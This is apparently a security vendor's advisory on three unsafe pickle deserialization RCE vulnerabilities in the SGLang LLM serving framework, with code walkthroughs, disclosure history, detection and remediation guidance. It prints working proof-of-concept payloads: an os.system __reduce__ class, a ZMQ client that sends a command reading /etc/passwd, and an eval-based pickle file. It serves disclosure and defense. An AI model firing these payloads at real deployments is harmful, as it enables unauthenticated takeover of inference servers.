Critical RCE Vulnerabilities in SGLang LLM Framework

Quick Overview
CVSS Rationale
What Is SGLang?
Technical Analysis
Affected Versions
Disclosure Timeline
Threat Status
Detection Guidance
Remediation
- Proposed Patch (Unmerged)
- Long-Term Recommendation
The Bigger Picture: Pickle in AI/ML Infrastructure
How Can Orca Help?
Acknowledgments

The Orca Security Research Pod continuously investigates the security posture of widely adopted AI/ML infrastructure. During a focused audit of LLM serving frameworks, I discovered multiple unsafe deserialization vulnerabilities in SGLang, a popular open-source framework for serving large language models and multimodal AI models. These findings were coordinated through CERT/CC (case VU#665416), with additional analysis contributed by CERT/CC vulnerability researcher Christopher Cullen.

Three CVEs have been assigned: CVE-2026-3059, CVE-2026-3060, and CVE-2026-3989. The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features to the network. The third involves insecure deserialization in a crash dump replay utility. At the time of publication, the SGLang maintainers have not responded to coordinated disclosure efforts, and no official patch is available.

Quick Overview

Attribute	CVE-2026-3059	CVE-2026-3060	CVE-2026-3989
Component	Multimodal generation ZMQ broker (`scheduler_client.py`)	Disaggregation encoder receiver (`encode_receiver.py`)	Crash dump replay script (`replay_request_dump.py`)
CWE	CWE-502 (Deserialization of Untrusted Data)	CWE-502 (Deserialization of Untrusted Data)	CWE-502 (Deserialization of Untrusted Data)
CVSS 3.1	9.8 Critical	9.8 Critical	7.8 High
CVSS Vector	AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H	AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H	AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector	Network	Network	Local
Authentication	None	None	None
User Interaction	None	None	Required
Affected Versions	≥ 0.5.5 through latest (0.5.9 at time of publication)	All versions with disaggregation module	All versions containing `replay_request_dump.py`
Fix Available	No	No	No

CVSS Rationale

CVE-2026-3059 and CVE-2026-3060 score 9.8 because the ZMQ broker binds to all available network interfaces (tcp://*) by default with zero authentication, and the pickle.loads() call executes immediately on any received payload. An attacker with network access to the exposed port needs nothing else – no credentials, no user interaction, no complex race conditions. The result is full code execution in the context of the SGLang process. This is a textbook unauthenticated network RCE.

Note: The 9.8 base score reflects severity when the affected feature is active. The multimodal generation and disaggregation modules must be explicitly enabled; default text-only SGLang deployments do not expose the vulnerable broker.

CVE-2026-3989 scores 7.8 High (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). While the impact upon execution is the same as the network RCEs – full arbitrary code execution – the attack prerequisites are meaningfully different. This is a debugging utility in a scripts/playground/ directory; exploitation requires an attacker to plant a malicious .pkl file where an operator will manually load it, via write access to a crash dump directory or social engineering. It underscores the systemic nature of unsafe pickle usage throughout the SGLang codebase.

What Is SGLang?

SGLang is an open-source serving framework developed by LMSYS for running large language models and multimodal AI models in production. It supports a wide range of popular models – including Qwen, DeepSeek, Mistral, and Skywork – and provides OpenAI-compatible API endpoints. SGLang is designed for high-throughput, low-latency inference and is used across research labs and production deployments. In most production environments, SGLang runs inside containerized GPU inference infrastructure – Kubernetes pods, Docker containers, or dedicated GPU nodes. Compromising an SGLang instance could expose model weights, inference data, API credentials, GPU workloads, and potentially provide a pivot point into the surrounding cluster environment.

Technical Analysis

Root Cause: Python’s `pickle` on Untrusted Network Data

All three vulnerabilities share a single root cause: the use of Python’s pickle module to deserialize data from untrusted sources.

Python’s own documentation explicitly warns that the pickle module is not secure and should never be used to deserialize untrusted data. The reason is fundamental to how pickle works – a pickle stream doesn’t just encode data, it encodes instructions for reconstructing Python objects. An attacker can craft a pickle payload whose reconstruction instructions include arbitrary function calls, achieving full code execution the moment pickle.loads() runs.

This is not a novel class of vulnerability. The same pattern has led to RCE in other ML serving frameworks, notably CVE-2024-9053 in vLLM and CVE-2025-10164 in a previous SGLang component. The persistence of pickle-based deserialization in ML tooling is a systemic problem, and SGLang’s codebase contains over 20 instances of pickle.loads() across different modules.

How Pickle Deserialization Becomes Code Execution

For readers less familiar with Python internals, it’s worth understanding why pickle.loads() on untrusted data is equivalent to eval().

When Python pickles an object, it stores instructions for how to rebuild that object later. These instructions include which callable to invoke and what arguments to pass. The __reduce__ method on a Python class controls this process – it tells pickle how to “reduce” an object to a reconstructable form. Critically, the callable specified in __reduce__ is not restricted to constructors. It can be any callable, including os.system, subprocess.Popen, or eval.

Here is the core of our proof-of-concept payload:

class RCEPayload:
    def __init__(self, cmd):
        self.cmd = cmd
    def __reduce__(self):
        return (os.system, (self.cmd,))

class RCEPayload:
    def __init__(self, cmd):
        self.cmd = cmd
    def __reduce__(self):
        return (os.system, (self.cmd,))

When pickle.loads() processes a serialized RCEPayload, it doesn’t reconstruct an RCEPayload instance. Instead, it calls os.system(cmd) executing an arbitrary shell command. The pickle protocol faithfully follows the stored instructions with no sandboxing, no allowlisting, and no type checking.

The serialized payload is just bytes on the wire. There’s nothing in the pickle bytestream that distinguishes “safe data” from “malicious instruction.” From the ZMQ broker’s perspective, it receives bytes, calls pickle.loads(), and execution happens before any application-level validation could occur.

CVE-2026-3059: Multimodal Generation Broker – Full Code Flow

To understand the attack surface, we need to trace the complete path from server startup to deserialization.

Step 1: Server Launch

When an operator starts SGLang’s diffusion server:

python -m sglang.multimodal_gen.runtime.launch_server \
    --model-path stabilityai/stable-diffusion-3-medium \
    --port 8000

python -m sglang.multimodal_gen.runtime.launch_server \
    --model-path stabilityai/stable-diffusion-3-medium \
    --port 8000

The FastAPI application lifecycle hook automatically starts the ZMQ broker as a background task:

@asynccontextmanager
async def lifespan(app: FastAPI):
    # ...
    broker_task = asyncio.create_task(run_zeromq_broker(server_args))
    yield
    broker_task.cancel()

@asynccontextmanager
async def lifespan(app: FastAPI):
    # ...
    broker_task = asyncio.create_task(run_zeromq_broker(server_args))
    yield
    broker_task.cancel()

The broker starts automatically as part of the application lifecycle when the multimodal server is running.

Step 2: Broker Binds to All Interfaces

The broker opens a ZeroMQ REP socket and binds to tcp://*:{broker_port}:

async def run_zeromq_broker(server_args: ServerArgs):
    ctx = zmq.asyncio.Context()
    socket = ctx.socket(zmq.REP)
    broker_endpoint = f"tcp://*:{server_args.broker_port}"  # ALL interfaces
    socket.bind(broker_endpoint)

async def run_zeromq_broker(server_args: ServerArgs):
    ctx = zmq.asyncio.Context()
    socket = ctx.socket(zmq.REP)
    broker_endpoint = f"tcp://*:{server_args.broker_port}"  # ALL interfaces
    socket.bind(broker_endpoint)

The tcp://* binding means the broker listens on all available network interfaces – 127.0.0.1, the machine’s LAN IP, any public IP, and any container/pod network interface. The broker port defaults to http_port + 1. In the launch example above (--port 8000), the broker listens on port 8001. With SGLang’s default HTTP port of 30000, the broker would be on port 30001.

Although broker_host exists as a field in ServerArgs, the original code ignores it and hardcodes the binding to *.

Step 3: Direct Deserialization of Network Data

The broker’s main loop receives raw bytes and passes them directly to pickle.loads():

while True:
        try:
            payload = await socket.recv()
            request_batch = pickle.loads(payload)  # <-- RCE here
            logger.info("Broker received an offline job from a client.")
            response_batch = await async_scheduler_client.forward(request_batch)
            await socket.send(pickle.dumps(response_batch))
        except Exception as e:
            logger.error(f"Error in ZMQ Broker: {e}", exc_info=True)
            try:
                await socket.send(pickle.dumps({"status": "error", "message": str(e)}))
            except Exception:
                pass

while True:
        try:
            payload = await socket.recv()
            request_batch = pickle.loads(payload)  # <-- RCE here
            logger.info("Broker received an offline job from a client.")
            response_batch = await async_scheduler_client.forward(request_batch)
            await socket.send(pickle.dumps(response_batch))
        except Exception as e:
            logger.error(f"Error in ZMQ Broker: {e}", exc_info=True)
            try:
                await socket.send(pickle.dumps({"status": "error", "message": str(e)}))
            except Exception:
                pass

There are zero security boundaries between socket.recv() and pickle.loads(). No authentication check. No message format validation. No source IP filtering. No TLS. The ZMQ REP socket accepts connections from any source, and the first thing the code does with the received bytes is deserialize them with pickle.

Note also that the exception handler catches the error after the payload has already been deserialized and executed – the except block cannot prevent the RCE, it only handles downstream errors.

Step 4: Exploitation

From the attacker’s side, the exploit is minimal – a standard ZMQ REQ socket and a pickle payload:

ctx = zmq.Context()
sock = ctx.socket(zmq.REQ)
sock.connect(f"tcp://{target}:{port}")

payload = pickle.dumps(RCEPayload("id; cat /etc/passwd"))
sock.send(payload)

ctx = zmq.Context()
sock = ctx.socket(zmq.REQ)
sock.connect(f"tcp://{target}:{port}")

payload = pickle.dumps(RCEPayload("id; cat /etc/passwd"))
sock.send(payload)

This is a single-message exploit. The attacker connects, sends one ZMQ message, and the command executes. The ZMQ REP/REQ pattern even sends a response back, confirming that the broker processed the message.

CVE-2026-3060: Disaggregation Encoder Receiver

The same pickle deserialization pattern exists in a completely separate component – SGLang’s encoder parallel disaggregation system in encode_receiver.py (lines 202 and 643).

This module is activated when a user passes the --encoder-transfer-backend zmq_to_scheduler flag, enabling ZMQ-based transfer between encoder and scheduler components. Like the multimodal broker, it binds a ZMQ socket to tcp://* and calls pickle.loads() on incoming payloads without authentication.

The attack mechanics are identical to CVE-2026-3059, but the code is maintained by a different team within the SGLang project (@ByronHsu, @hnyls2002, @ShangmingCai). This is worth noting because it means patches – if they ever arrive – may land on different timelines for the two components.

CVE-2026-3989: Crash Dump Replay Script

The replay_request_dump.py utility in scripts/playground/ loads .pkl files with pickle.load() and no validation:

def read_records(files):
    records = []
    for f in files:
        tmp = pickle.load(open(f, "rb"))
        if isinstance(tmp, dict) and "requests" in tmp:
            records.extend(tmp["requests"])
        else:
            records.extend(tmp)
    return records

def read_records(files):
    records = []
    for f in files:
        tmp = pickle.load(open(f, "rb"))
        if isinstance(tmp, dict) and "requests" in tmp:
            records.extend(tmp["requests"])
        else:
            records.extend(tmp)
    return records

The script is designed to replay crash dumps generated by SGLang when --crash-dump-folder is configured. Here’s the attack scenario in concrete terms:

SGLang writes crash dump .pkl files to a configured directory (e.g., /data/sglang_crash_dump/).
An attacker with write access to that directory – or who can supply a file via social engineering (“can you replay this crash dump for me?”) – drops a malicious .pkl file.
The operator runs: python3 replay_request_dump.py --input-file /data/sglang_crash_dump/malicious.pkl
pickle.load() executes the attacker’s payload.

The PoC for this CVE (developed by CERT/CC) uses a payload that returns a valid {'requests': []} structure after executing its code, so the script continues running normally – the operator may not even notice the execution:

class POC:
    def __reduce__(self):
        payload = (
            "(__import__('pathlib').Path('poc_marker.txt').write_text("
            "'pickle payload executed\\n', encoding='utf-8'), {'requests': []})[1]"
        )
        return (eval, (payload,))

class POC:
    def __reduce__(self):
        payload = (
            "(__import__('pathlib').Path('poc_marker.txt').write_text("
            "'pickle payload executed\\n', encoding='utf-8'), {'requests': []})[1]"
        )
        return (eval, (payload,))

Proposed Patch Analysis

As part of the coordinated disclosure, CERT/CC vulnerability researcher Christopher Cullen developed a proposed patch with two changes:

Change 1: Localhost binding (effective)

# Original: binds to all interfaces
broker_endpoint = f"tcp://*:{server_args.broker_port}"

# Patched: binds to localhost by default
host = server_args.broker_host or "127.0.0.1"
broker_endpoint = f"tcp://{host}:{server_args.broker_port}"

# Original: binds to all interfaces
broker_endpoint = f"tcp://*:{server_args.broker_port}"

# Patched: binds to localhost by default
host = server_args.broker_host or "127.0.0.1"
broker_endpoint = f"tcp://{host}:{server_args.broker_port}"

This eliminates remote exploitation entirely. Even if pickle deserialization remains, an attacker would need local access to the machine.

Change 2: msgpack serialization with pickle fallback (partial)

The patch introduces _pack() / _unpack() functions that prefer msgpack but fall back to pickle:

def _unpack(b: bytes) -> Any:
    try:
        return _from_basic(msgpack.unpackb(b, raw=False))
    except Exception:
        return pickle.loads(b)  # Fallback still vulnerable

def _unpack(b: bytes) -> Any:
    try:
        return _from_basic(msgpack.unpackb(b, raw=False))
    except Exception:
        return pickle.loads(b)  # Fallback still vulnerable

This is a pragmatic transition mechanism – it allows existing pickle-speaking components to continue working while new messages use msgpack. However, the fallback means that an attacker who crafts a payload that deliberately fails msgpack parsing (which any valid pickle stream will) still reaches pickle.loads().

With the localhost binding in place, this is a local-only risk and acceptable for a transitional fix. Without the localhost binding, the msgpack wrapper alone would not prevent remote exploitation.

The synchronous SchedulerClient class also still uses send_pyobj() / recv_pyobj() (ZMQ’s built-in pickle-based methods), but these connect to internal scheduler endpoints rather than the exposed broker, making them lower priority.

The real fix: Both changes together are effective as an immediate mitigation. The long-term fix requires replacing all 20+ pickle.loads() instances throughout the codebase with safe serialization – a significant engineering effort that the vendor would need to own.

Attack Flow (CVE-2026-3059 / CVE-2026-3060)

The target runs SGLang with multimodal generation or disaggregation features enabled.
The ZMQ broker binds to tcp://*:{port}, accessible from the network.
The attacker connects to the exposed port and sends a pickle payload containing a malicious __reduce__ method.
SGLang calls pickle.loads() on the payload, triggering arbitrary code execution.
The attacker has code execution with the full privileges of the SGLang process.

No authentication. No headers. No API keys. Just a raw TCP connection and a pickle bytestream.

Affected Versions

Component	Introduced	Affected Range	Fixed Version
`multimodal_gen` (CVE-2026-3059)	Commit `7bc1dae09` (2025-11-05)	≥ 0.5.5 through latest (0.5.9+)	None
Disaggregation module (CVE-2026-3060)	Present in all versions with ZMQ disaggregation	All versions with feature	None
`replay_request_dump.py` (CVE-2026-3989)	Present since script creation	All versions	None

Disclosure Timeline

Date	Event
2026-02-04	Vulnerability discovered by Igor Stepansky (Orca Security)
2026-02-04	GitHub Security Advisory (GHSA-3cp7-c6q2-94xr) submitted to SGLang
2026-02-04	Report submitted to CERT/CC
2026-02-09	CERT/CC creates case VU#665416; vendor invited
2026-02-09	PoC files uploaded and validated
2026-02-10	CERT/CC confirms disclosure date of March 26, 2026
2026-02-17	CERT/CC reaches out directly to SGLang maintainers; no response
2026-02-23	CVE-2026-3059 and CVE-2026-3060 assigned; CERT/CC indicates plans to contact CISA for additional assistance
2026-03-02	CERT/CC develops proposed patch (msgpack + localhost binding)
2026-03-03	GHSA-wxjp-55q2-vg27 opened with patch proposal
2026-03-11	CVE-2026-3989 identified by CERT/CC (Christopher Cullen); CVE assigned

Despite multiple contact attempts through GitHub Security Advisories and direct email by CERT/CC – including outreach to CISA for assistance – the SGLang maintainers did not respond at any point during the coordination process. No vendor statement was obtained, and no official patch has been released.

Threat Status

Active Exploitation: No exploitation of these specific vulnerabilities has been observed in the wild at the time of publication.

PoC Availability: Functional proof-of-concept code for CVE-2026-3059 and CVE-2026-3060 exists and was shared with CERT/CC during coordination. A PoC for CVE-2026-3989 was developed by CERT/CC. Given the trivial nature of pickle deserialization exploits, weaponization requires minimal effort.

Important context: The multimodal generation and disaggregation features must be explicitly enabled for CVE-2026-3059 and CVE-2026-3060 to be exploitable. Default SGLang text-only inference deployments are not affected by these two CVEs. However, any deployment running multimodal_gen or disaggregation with ZMQ transport is immediately vulnerable if the broker port is network-reachable.

Detection Guidance

Network-level indicators for CVE-2026-3059 / CVE-2026-3060:

Monitor for unexpected inbound TCP connections to the ZMQ broker port (default: http_port + 1). ZMQ traffic on this port from external or untrusted source IPs is anomalous.
ZMQ uses a specific wire protocol – a ZMTP handshake followed by message frames. Network IDS signatures for ZMTP on unexpected ports can flag exposure.

Host-level indicators:

Unexpected child processes spawned by the SGLang Python process (e.g., /bin/sh, curl, wget, nc).
File creation in unusual locations by the SGLang process (e.g., /tmp/pwned, reverse shell scripts).
Outbound connections from the SGLang process to unexpected destinations.

Remediation

Immediate actions:

Network segmentation. Ensure ZMQ broker ports (default: http_port + 1) are not exposed to untrusted networks. Use firewall rules to restrict access to localhost or known internal clients only.
Review deployment flags. If you are not using multimodal generation or disaggregation features, ensure they are not enabled.
Audit crash dump handling. Do not run replay_request_dump.py on .pkl files from untrusted sources or shared directories with weak permissions.

Proposed Patch (Unmerged)

As detailed in the Patch Analysis section above, CERT/CC vulnerability researcher Christopher Cullen developed a proposed patch that binds the ZMQ broker to localhost by default and replaces pickle with msgpack serialization (with a transitional pickle fallback). This patch has been submitted to the SGLang maintainers via GitHub Security Advisory GHSA-wxjp-55q2-vg27 but has not been merged. Users may apply similar mitigations manually.

Long-Term Recommendation

SGLang’s codebase contains more than 20 instances of pickle.loads() and related unsafe deserialization calls. A comprehensive audit and migration to safe serialization formats (msgpack, JSON, or Protocol Buffers) is necessary to address the systemic risk.

The Bigger Picture: Pickle in AI/ML Infrastructure

This is not an isolated finding. Unsafe pickle deserialization is arguably the most prevalent vulnerability class in the Python AI/ML ecosystem. The pattern repeats across model serving frameworks, training pipelines, model registries, and utility scripts.

The reason is understandable: pickle is convenient. It serializes arbitrary Python objects with zero schema definition. For fast-moving ML projects focused on model performance rather than security hardening, pickle is the path of least resistance. But that convenience comes at a cost – every pickle.loads() call on untrusted input is an implicit eval().

Organizations deploying open-source LLM serving infrastructure should audit their dependencies for pickle usage, restrict network access to internal communication endpoints, and treat any pickle deserialization of external data as a critical security boundary.

How Can Orca Help?

The Orca Platform secures AI as an evolution of its core capabilities identifying, prioritizing, and remediating risk across cloud environments. With Orca, customers can:

inventory of AI models, cloud-managed AI services, unmanaged apps and other self-hosted AI frameworks
pinpoint where AI models and tools are running
detect sensitive data on the assets running AI projects, including training or fine-tuning datasets, as well as AI files
prioritize and remediate AI vulnerabilities and risks to AI workloads

To learn more or see the Orca Platform in action, schedule a personalized 1:1 demo.

Acknowledgments

Igor Stepansky (Orca Security) – vulnerability discovery, PoC development, and coordinated disclosure for CVE-2026-3059 and CVE-2026-3060

Christopher Cullen (CERT/CC) – coordination, patch development, CVE-2026-3989 discovery, and vulnerability note authoring

CERT/CC – case coordination (VU#665416)

Quick Overview
CVSS Rationale
What Is SGLang?
Technical Analysis
Affected Versions
Disclosure Timeline
Threat Status
Detection Guidance
Remediation
- Proposed Patch (Unmerged)
- Long-Term Recommendation
The Bigger Picture: Pickle in AI/ML Infrastructure
How Can Orca Help?
Acknowledgments

Pickle in the Pipeline: Critical RCE Vulnerabilities in SGLang’s LLM Serving Framework

Table of contents

Quick Overview

CVSS Rationale

What Is SGLang?

Technical Analysis

Root Cause: Python’s `pickle` on Untrusted Network Data

How Pickle Deserialization Becomes Code Execution

CVE-2026-3059: Multimodal Generation Broker – Full Code Flow

CVE-2026-3060: Disaggregation Encoder Receiver

CVE-2026-3989: Crash Dump Replay Script

Proposed Patch Analysis

Attack Flow (CVE-2026-3059 / CVE-2026-3060)

Affected Versions

Disclosure Timeline

Threat Status

Detection Guidance

Remediation

Proposed Patch (Unmerged)

Long-Term Recommendation

The Bigger Picture: Pickle in AI/ML Infrastructure

How Can Orca Help?

Acknowledgments

Table of contents

Stay in the loop

See Orca Security in Action

See Orca Security in Action

Cloud Security Platform

Technology Ecosystem

By Solution

By Industry

Comparisons

Table of contents

Quick Overview

CVSS Rationale

What Is SGLang?

Technical Analysis

Root Cause: Python’s pickle on Untrusted Network Data

How Pickle Deserialization Becomes Code Execution

CVE-2026-3059: Multimodal Generation Broker – Full Code Flow

CVE-2026-3060: Disaggregation Encoder Receiver

CVE-2026-3989: Crash Dump Replay Script

Proposed Patch Analysis

Attack Flow (CVE-2026-3059 / CVE-2026-3060)

Affected Versions

Disclosure Timeline

Threat Status

Detection Guidance

Remediation

Proposed Patch (Unmerged)

Long-Term Recommendation

The Bigger Picture: Pickle in AI/ML Infrastructure

How Can Orca Help?

Acknowledgments

Table of contents

Related articles

Data Security Posture Management (DSPM) for AI

Gitea Container Registry Exposes Private Images to Unauthenticated Attackers

Critical Unauthenticated RCE in Kopia Backup via SSH ProxyCommand Injection

Stay in the loop

See Orca Security in Action

See Orca Security in Action

Root Cause: Python’s `pickle` on Untrusted Network Data